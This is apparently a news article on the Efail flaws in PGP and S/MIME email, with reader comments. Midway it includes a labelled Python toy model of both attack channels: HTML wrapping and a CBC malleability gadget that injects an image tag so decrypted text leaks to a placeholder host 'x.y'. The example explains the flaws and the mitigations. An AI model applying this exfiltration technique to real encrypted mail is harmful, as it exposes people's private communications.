Vulnerabilities have been discovered in PGP and S/MIME that could allow an attacker to read emails encrypted using the standards, with one attack potentially allowing for a message to be decrypted by abusing a flaw in the way Mail for iOS and macOS renders HTML-based messages.
European security researchers have published a warning about the so-called "Efail" attacks, explaining that there are two varieties that affect people who use PGP and S/MIME plug-ins to secure their communications in email clients. The attacks exploit weaknesses in the OpenPGP and S/MIME standards, and because they operate on ciphertext the attacker has already captured, they apply to any encrypted email sent to the victim, including messages received months or years ago.
The attacks abuse how an email client renders HTML content included in a message, for example by loading externally hosted images. The attacker first needs the victim's encrypted emails, obtained from an account or mail server the attacker can access or by eavesdropping on the connection. The attacker then modifies one of the captured encrypted emails and sends it to the victim's account.
When the victim opens the message, the client decrypts it and renders the HTML, and in the course of loading the external content it sends the plaintext sections of the email to the attacker's server, typically as part of an image URL.
The researchers, from three European universities, write that the "Direct Exfiltration" method affects "Apple Mail, iOS Mail, and Mozilla Thunderbird," and that these clients can be patched to stop it. It is unclear if Apple has supplied patches to fix the vulnerability, but it is likely a solution is on the way if it has not yet been deployed.
A second method, termed the "CBC/CFB Gadget Attack," is claimed to affect any standards-conforming email client, and is also patchable at the client level. The researchers advise that, in the long term, "it is necessary to update the specification (for OpenPGP and S/MIME) to find and document changes that fix the underlying root cause."
The second method is more involved. Both S/MIME (which uses CBC mode) and OpenPGP (which uses CFB mode) encrypt in a way that is malleable: an attacker who knows part of the plaintext, such as the predictable MIME header at the start of the body, can modify ciphertext blocks so that they decrypt to text of the attacker's choosing. By inserting such blocks, the attacker injects an image tag into the encrypted section itself, and the plaintext message is sent to the attacker once the malformed encrypted message is opened and rendered by the victim.
To mitigate the attack in the short term, the researchers advise users to disable HTML rendering for incoming messages in their email clients. Where that is not possible, they advise decrypting messages in a separate application rather than in the email client, which keeps the decrypted text away from the client's HTML renderer and the exfiltration channels it opens.
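The two channels described above, and the difference between the client-side fix for the first and the HTML/remote-content mitigation that covers both, as an added example that is not code from the article, the Efail team or any mail client. Everything in it is constructed: the toy Feistel block cipher standing in for AES, the key, IV and message, the list-of-parts stand-in for a multipart/mixed message, and the placeholder attacker host written as x.y.

```python
"""Added example, not code from the article or the Efail team: a toy model
of both Efail channels with a constructed cipher, message and attacker host."""
import hashlib
import hmac
import os
import re

BLOCK = 16
PREFIX = b'<img src="//x.y/'   # exactly one block; x.y stands for the attacker's host
SUFFIX = b'">'.ljust(BLOCK)    # closes the tag; trailing spaces render as nothing

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _f(key, half, rnd):
    # Feistel round function: keyed hash of one 8-byte half.
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:8]

def block_encrypt(key, block):
    # 8-round Feistel network on 16-byte blocks, a toy stand-in for AES.
    # Nothing in the gadget below depends on the block cipher's internals.
    l, r = block[:8], block[8:]
    for rnd in range(8):
        l, r = r, _xor(l, _f(key, r, rnd))
    return l + r

def block_decrypt(key, block):
    l, r = block[:8], block[8:]
    for rnd in reversed(range(8)):
        l, r = _xor(r, _f(key, l, rnd)), l
    return l + r

def cbc_encrypt(key, iv, plaintext):
    # Space-pads to a block boundary (S/MIME uses PKCS#7; spaces keep the toy
    # output printable).  Returns iv || ciphertext: one "encrypted part".
    plaintext = plaintext.ljust(-(-len(plaintext) // BLOCK) * BLOCK, b" ")
    out, prev = [iv], iv
    for i in range(0, len(plaintext), BLOCK):
        prev = block_encrypt(key, _xor(plaintext[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(key, part):
    iv, ct = part[:BLOCK], part[BLOCK:]
    out, prev = [], iv
    for i in range(0, len(ct), BLOCK):
        out.append(_xor(block_decrypt(key, ct[i:i + BLOCK]), prev))
        prev = ct[i:i + BLOCK]
    return b"".join(out)

def direct_exfiltration(part):
    # Channel 1: ciphertext untouched.  Two attacker-written HTML parts of a
    # multipart/mixed message wrap it so the decrypted text ends up in a URL.
    return [("html", PREFIX), ("enc", part), ("html", SUFFIX)]

def cbc_gadget(part, known_p0):
    # Channel 2: CBC is malleable.  D(C0) = P0 ^ IV, so the pair (X, C0) with
    # X = IV ^ P0 ^ chosen decrypts to `chosen`; known_p0 is the predictable
    # MIME header at the start of the body.
    iv, c0 = part[:BLOCK], part[BLOCK:2 * BLOCK]
    x1 = _xor(_xor(iv, known_p0), PREFIX)
    x2 = _xor(_xor(iv, known_p0), SUFFIX)
    # X1 || C0 || IV || C0..Cn || X2 || C0 decrypts to
    # PREFIX || random || P0..Pn || random || SUFFIX.  Both random blocks land
    # inside the URL; a real attack must tolerate the chance that one of them
    # contains a quote or angle bracket.
    return [("enc", x1 + c0 + part + x2 + c0)]

def vulnerable_client(key, parts):
    # Pre-patch behaviour: decrypt every encrypted part, then glue all parts
    # into ONE HTML document before rendering.
    return [b"".join(b if k == "html" else cbc_decrypt(key, b) for k, b in parts)]

def patched_client(key, parts):
    # Fix for channel 1: each MIME part is rendered as its own document, so
    # attacker HTML cannot wrap the plaintext.  A tag injected into the
    # ciphertext itself (channel 2) still renders.
    return [b if k == "html" else cbc_decrypt(key, b) for k, b in parts]

def leaked_urls(documents, load_remote=True):
    # Crude renderer: every <img src="..."> triggers a fetch.  With HTML or
    # remote content disabled nothing is fetched, which covers both channels.
    if not load_remote:
        return []
    return [u for d in documents for u in re.findall(rb'<img src="(.*?)">', d, re.S)]

def demo():
    key, iv = os.urandom(32), os.urandom(BLOCK)   # the attacker never sees the key
    # Constructed message; S/MIME bodies start with a predictable MIME header.
    secret = b"Content-Type: text/plain\r\n\r\nwire $1M to acct 42"
    part = cbc_encrypt(key, iv, secret)
    attacks = {"direct": direct_exfiltration(part),
               "gadget": cbc_gadget(part, secret[:BLOCK])}
    return {(name, client.__name__): leaked_urls(client(key, parts))
            for name, parts in attacks.items()
            for client in (vulnerable_client, patched_client)}

if __name__ == "__main__":
    for (attack, client), urls in demo().items():
        print(attack, client, urls)
```

Running `demo()` shows the secret inside the fetched URL for the vulnerable client under both attacks, an empty list for the patched client under direct exfiltration, and the secret leaking again for the patched client under the gadget attack, which is why the researchers call for changes to the standards rather than only to clients. OpenPGP's CFB mode has the analogous gadget: with P_i known, E(C_{i-1}) = P_i XOR C_i is known, so the pair (C_{i-1}, E(C_{i-1}) XOR chosen) decrypts to chosen.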
The Electronic Frontier Foundation's advisory also warns users to disable encryption plugins in their clients, including GPGTools for Apple Mail and Enigmail for Thunderbird.
The researchers plan to release full details of the vulnerabilities and the attacks in a paper on Tuesday morning at 3am eastern time. Today's announcement is said by the EFF to be a warning to the "wider PGP user community in advance of its full publication."
6 Comments
Nice to know about security issues that need to be fixed but I’d also like to know if any of these things ever gain real traction in the wild. We read a report like this, the nervous Nellies and paranoid Phils go apeshit and run around with their hair on fire heaping recriminations on Apple and anyone else involved. Then we never hear about them again. This article advises users to disable HTML rendering, which I will not do because I don’t encrypt email to begin with and this attack vector seems attractive only to state actors targeting specific individuals. So if you are a bad guy or spy you may want to take care I suppose. And if you are one of those who encrypt your email to your aunt Betty then that’s your problem.
Apple has always been the most secure. They will fix it for us. I never trusted the EFF.
I sure hope that, while Apple works on this issue, it’ll spur them to consolidate their S/MIME implementation (or even add native support to PGP/GPG). As it stands now, iOS Mail won’t recognize the S/MIME certificates I generated in macOS keychain (even though Apple Mail in macOS has no trouble with them).
I mean, how much trouble would it be for Apple to act as a CA, issuing certificates for our @mac, @me, and @icloud emails. It would go right along with their privacy values.
To avoid backlash, make it opt in, so the tech illiterate, who would fluster with an s/mime attachment on their webmail (eww...), don’t die from brain hemorrhage.
Meh - not a big deal really. Plus I use the GMail iOS app anyway